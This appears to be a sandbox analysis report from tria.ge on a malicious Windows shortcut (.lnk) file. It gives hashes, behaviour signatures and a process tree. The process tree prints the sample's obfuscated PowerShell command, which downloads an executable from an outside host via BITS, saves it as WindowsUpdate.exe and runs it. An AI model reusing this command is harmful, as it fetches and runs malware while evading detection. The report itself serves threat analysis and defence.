Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
10/04/2024, 14:59
Static task
static1
Behavioral task
behavioral1
Sample
f6ae1d54de68b48ba8bd5262233edaec6669c18f05f986764cf9873ce3247166.lnk
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
f6ae1d54de68b48ba8bd5262233edaec6669c18f05f986764cf9873ce3247166.lnk
Resource
win10v2004-20240226-en
General
-
Target
f6ae1d54de68b48ba8bd5262233edaec6669c18f05f986764cf9873ce3247166.lnk
-
Size
1KB
-
MD5
efcff826fa14c23c9abcd53e0a148383
-
SHA1
f79f22761707f666178f8855fcfb95a46065dd21
-
SHA256
f6ae1d54de68b48ba8bd5262233edaec6669c18f05f986764cf9873ce3247166
-
SHA512
c27f5edcd4b12500af5a7a46541bd0e6fda71bcce954e8a40138fe812adca4fb0fb46d442c3d420dfcba0937484a1ad106fb3aa94c04a2c15727d1f0a0fb45a5
Malware Config
Extracted
http://001000100.xyz/soft/upd03212.exe
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1152 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1152 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3024 wrote to memory of 2792 3024 cmd.exe 29 PID 3024 wrote to memory of 2792 3024 cmd.exe 29 PID 3024 wrote to memory of 2792 3024 cmd.exe 29 PID 2792 wrote to memory of 1152 2792 cmd.exe 30 PID 2792 wrote to memory of 1152 2792 cmd.exe 30 PID 2792 wrote to memory of 1152 2792 cmd.exe 30
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\f6ae1d54de68b48ba8bd5262233edaec6669c18f05f986764cf9873ce3247166.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" && C:\Windows\System32\cmd.exe /c poweRshELL.eXE -w 1 $env:SEE_MASK_NOZONECHECKS = 1; Im`Po`RT`-modULe bItsTR`Ans`Fer; STArt-b`IT`sT`R`AN`SF`ER -Source "('ht'+'tp'+'://001'+'000'+'100.x'+'yz'+'/so'+'ft'+'/upd'+'03'+'212.e'+'xe')" -Destination $ENV:TEMP\WindowsUpdate.exe ;.('cd') ${eNv:TEMP}; ./`WindowsUpdate.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoweRshELL.eXE -w 1 $env:SEE_MASK_NOZONECHECKS = 1; Im`Po`RT`-modULe bItsTR`Ans`Fer; STArt-b`IT`sT`R`AN`SF`ER -Source "('ht'+'tp'+'://001'+'000'+'100.x'+'yz'+'/so'+'ft'+'/upd'+'03'+'212.e'+'xe')" -Destination $ENV:TEMP\WindowsUpdate.exe ;.('cd') ${eNv:TEMP}; ./`WindowsUpdate.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1152
-
-